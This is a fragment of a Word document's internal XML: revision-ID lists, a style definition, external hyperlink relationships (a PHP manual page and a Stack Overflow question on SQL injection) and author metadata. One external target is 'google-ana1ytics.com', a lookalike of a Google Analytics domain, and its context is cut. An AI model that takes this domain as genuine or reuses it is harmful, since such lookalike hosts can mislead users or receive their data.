    <w:rsid w:val="490D1874"/>
    <w:rsid w:val="491C9533"/>
    <w:rsid w:val="495002CF"/>
    <w:rsid w:val="496EDF40"/>
    <w:rsid w:val="4974F64F"/>
    <w:rsid w:val="499DF1D5"/>
    <w:rsid w:val="4B135BF4"/>
    <w:rsid w:val="4B510785"/>
    <w:rsid w:val="4B6A6459"/>
    <w:rsid w:val="4BA60F5A"/>
    <w:rsid w:val="4BAAC26D"/>
    <w:rsid w:val="4C616BFD"/>
    <w:rsid w:val="4CC85DAB"/>
    <w:rsid w:val="4CEA4801"/>
    <w:rsid w:val="4D2E846D"/>
    <w:rsid w:val="4D411314"/>
    <w:rsid w:val="4DAC8689"/>
    <w:rsid w:val="4DB5D087"/>
    <w:rsid w:val="4DE54CAC"/>
    <w:rsid w:val="4DF51E34"/>
    <w:rsid w:val="4E4076A0"/>
    <w:rsid w:val="4ED0BD72"/>
    <w:rsid w:val="4F198A95"/>
    <w:rsid w:val="4F49166A"/>
    <w:rsid w:val="4F4BCD5E"/>
    <w:rsid w:val="4F92996A"/>
    <w:rsid w:val="5048ABCC"/>
    <w:rsid w:val="50615B4B"/>
    <w:rsid w:val="5066252F"/>
    <w:rsid w:val="5082E5ED"/>
    <w:rsid w:val="5116CD0E"/>
    <w:rsid w:val="51296530"/>
    <w:rsid w:val="513D5377"/>
    <w:rsid w:val="515AAD53"/>
    <w:rsid w:val="517CA068"/>
    <w:rsid w:val="519D6C3D"/>
    <w:rsid w:val="51EC5C0A"/>
    <w:rsid w:val="51F631D6"/>
    <w:rsid w:val="5251FDDA"/>
    <w:rsid w:val="526CD15C"/>
    <w:rsid w:val="5291C250"/>
    <w:rsid w:val="5301264B"/>
    <w:rsid w:val="53106686"/>
    <w:rsid w:val="531489D3"/>
    <w:rsid w:val="53542E85"/>
    <w:rsid w:val="5360FE0E"/>
    <w:rsid w:val="5376D40B"/>
    <w:rsid w:val="53B3EDAB"/>
    <w:rsid w:val="53EE4642"/>
    <w:rsid w:val="53EF7E78"/>
    <w:rsid w:val="54912706"/>
    <w:rsid w:val="54BFFD77"/>
    <w:rsid w:val="54CF1654"/>
    <w:rsid w:val="54D26695"/>
    <w:rsid w:val="54F2664F"/>
    <w:rsid w:val="551EA35B"/>
    <w:rsid w:val="55259FDA"/>
    <w:rsid w:val="553D1531"/>
    <w:rsid w:val="556ED1D8"/>
    <w:rsid w:val="55C336D7"/>
    <w:rsid w:val="55E5F3CB"/>
    <w:rsid w:val="55ED4DBB"/>
    <w:rsid w:val="562F9244"/>
    <w:rsid w:val="56BC3E56"/>
    <w:rsid w:val="57609236"/>
    <w:rsid w:val="57AD255F"/>
    <w:rsid w:val="57E03E6C"/>
    <w:rsid w:val="5858B5DF"/>
    <w:rsid w:val="588C9FC1"/>
    <w:rsid w:val="58959C27"/>
    <w:rsid w:val="58FC6297"/>
    <w:rsid w:val="590427E4"/>
    <w:rsid w:val="591368A8"/>
    <w:rsid w:val="592621DD"/>
    <w:rsid w:val="5929A740"/>
    <w:rsid w:val="5932766A"/>
    <w:rsid w:val="594D695E"/>
    <w:rsid w:val="597C38DB"/>
    <w:rsid w:val="59F7B631"/>
    <w:rsid w:val="5A0D0775"/>
    <w:rsid w:val="5A508AF5"/>
    <w:rsid w:val="5A76E84A"/>
    <w:rsid w:val="5A8F7104"/>
    <w:rsid w:val="5A935770"/>
    <w:rsid w:val="5A9832F8"/>
    <w:rsid w:val="5AA10A59"/>
    <w:rsid w:val="5AF49A91"/>
    <w:rsid w:val="5B200951"/>
    <w:rsid w:val="5B42A9F3"/>
    <w:rsid w:val="5B522C09"/>
    <w:rsid w:val="5BA8D7D6"/>
    <w:rsid w:val="5BB18A8D"/>
    <w:rsid w:val="5BC40A69"/>
    <w:rsid w:val="5BCB735F"/>
    <w:rsid w:val="5C219BEB"/>
    <w:rsid w:val="5C51EA82"/>
    <w:rsid w:val="5C55BA51"/>
    <w:rsid w:val="5CB5D149"/>
    <w:rsid w:val="5CDC498A"/>
    <w:rsid w:val="5CEEFB9B"/>
    <w:rsid w:val="5D15C178"/>
    <w:rsid w:val="5D9861ED"/>
    <w:rsid w:val="5DA69F76"/>
    <w:rsid w:val="5E3C4243"/>
    <w:rsid w:val="5E9C2453"/>
    <w:rsid w:val="5EABE09E"/>
    <w:rsid w:val="5F2362DD"/>
    <w:rsid w:val="5F3C8B3A"/>
    <w:rsid w:val="5F48F8FB"/>
    <w:rsid w:val="5F5D0F25"/>
    <w:rsid w:val="5F6E1D66"/>
    <w:rsid w:val="5F7FF674"/>
    <w:rsid w:val="5FC95357"/>
    <w:rsid w:val="5FF37A74"/>
    <w:rsid w:val="608AB5AB"/>
    <w:rsid w:val="60D9F679"/>
    <w:rsid w:val="60FDF1B9"/>
    <w:rsid w:val="616A289C"/>
    <w:rsid w:val="61D57FC2"/>
    <w:rsid w:val="620E743F"/>
    <w:rsid w:val="625422A4"/>
    <w:rsid w:val="63060F3E"/>
    <w:rsid w:val="631C6723"/>
    <w:rsid w:val="638E50FC"/>
    <w:rsid w:val="64182CCC"/>
    <w:rsid w:val="6420A637"/>
    <w:rsid w:val="644E588E"/>
    <w:rsid w:val="64E9BDF5"/>
    <w:rsid w:val="65DB01CC"/>
    <w:rsid w:val="667CCCB6"/>
    <w:rsid w:val="6799B142"/>
    <w:rsid w:val="67B22AC9"/>
    <w:rsid w:val="681FEB17"/>
    <w:rsid w:val="6825655E"/>
    <w:rsid w:val="690B7B38"/>
    <w:rsid w:val="694685D7"/>
    <w:rsid w:val="695B298E"/>
    <w:rsid w:val="6983894B"/>
    <w:rsid w:val="69AB07FB"/>
    <w:rsid w:val="69CC16F5"/>
    <w:rsid w:val="6A0A208D"/>
    <w:rsid w:val="6A249D4F"/>
    <w:rsid w:val="6A9D72E4"/>
    <w:rsid w:val="6AFCE81B"/>
    <w:rsid w:val="6B16EE32"/>
    <w:rsid w:val="6B2A186E"/>
    <w:rsid w:val="6B31C373"/>
    <w:rsid w:val="6BAFCAFF"/>
    <w:rsid w:val="6BBDBB5D"/>
    <w:rsid w:val="6C9E696E"/>
    <w:rsid w:val="6CE3D5C8"/>
    <w:rsid w:val="6D5CD637"/>
    <w:rsid w:val="6E73D9D8"/>
    <w:rsid w:val="6EADB52B"/>
    <w:rsid w:val="6F4EE0AE"/>
    <w:rsid w:val="6F781DB5"/>
    <w:rsid w:val="6F8BBA9B"/>
    <w:rsid w:val="700FAA50"/>
    <w:rsid w:val="7026EFBE"/>
    <w:rsid w:val="705EF231"/>
    <w:rsid w:val="7066C207"/>
    <w:rsid w:val="70760F4D"/>
    <w:rsid w:val="70A596FF"/>
    <w:rsid w:val="70BCB76E"/>
    <w:rsid w:val="70C1558D"/>
    <w:rsid w:val="70DF5FED"/>
    <w:rsid w:val="718F2413"/>
    <w:rsid w:val="71B9D762"/>
    <w:rsid w:val="71C88729"/>
    <w:rsid w:val="72526D3E"/>
    <w:rsid w:val="72F82765"/>
    <w:rsid w:val="730AA4C3"/>
    <w:rsid w:val="735EF453"/>
    <w:rsid w:val="7394C969"/>
    <w:rsid w:val="73AB094E"/>
    <w:rsid w:val="73BEF624"/>
    <w:rsid w:val="73E32675"/>
    <w:rsid w:val="73E6C442"/>
    <w:rsid w:val="740A5864"/>
    <w:rsid w:val="7433F24A"/>
    <w:rsid w:val="747E213E"/>
    <w:rsid w:val="748D32B5"/>
    <w:rsid w:val="7499AEAA"/>
    <w:rsid w:val="74BEFEDF"/>
    <w:rsid w:val="74C3AA67"/>
    <w:rsid w:val="7546D9AF"/>
    <w:rsid w:val="75669B1D"/>
    <w:rsid w:val="75A4AB59"/>
    <w:rsid w:val="75D64BCF"/>
    <w:rsid w:val="75FE2C14"/>
    <w:rsid w:val="75FF2941"/>
    <w:rsid w:val="771E6504"/>
    <w:rsid w:val="777778C5"/>
    <w:rsid w:val="77EE6C43"/>
    <w:rsid w:val="780CF80F"/>
    <w:rsid w:val="78481107"/>
    <w:rsid w:val="78831608"/>
    <w:rsid w:val="78A19590"/>
    <w:rsid w:val="795A4E65"/>
    <w:rsid w:val="79D7078D"/>
    <w:rsid w:val="79EA9B87"/>
    <w:rsid w:val="7A2FFEAA"/>
    <w:rsid w:val="7A3E1BC6"/>
    <w:rsid w:val="7A613BD4"/>
    <w:rsid w:val="7A7C55FA"/>
    <w:rsid w:val="7AFFD2DE"/>
    <w:rsid w:val="7B04E71D"/>
    <w:rsid w:val="7B4E7302"/>
    <w:rsid w:val="7BACD7AE"/>
    <w:rsid w:val="7BD9EC27"/>
    <w:rsid w:val="7BF59C70"/>
    <w:rsid w:val="7C458D53"/>
    <w:rsid w:val="7D26C112"/>
    <w:rsid w:val="7E47D0D3"/>
    <w:rsid w:val="7E90F5A7"/>
    <w:rsid w:val="7E9232EC"/>
    <w:rsid w:val="7EDAE4C4"/>
    <w:rsid w:val="7EFF41CA"/>
    <w:rsid w:val="7F2821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36D7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7AC2435F-1831-4828-A157-D911BD17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13CFE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentSubjectChar" w:customStyle="1">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B13C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php.net/manual/en/language.oop5.anonymous.php" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/21581387/after-using-quoteinto-am-i-safe-from-sql-injection"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google-ana1ytics.com"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 Bill</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Ward, Ryan</lastModifiedBy>
  <revision>12</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-03T10:00:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-23T07:05:07.6765562Z</dcterms:modified>
</coreProperties>
</file>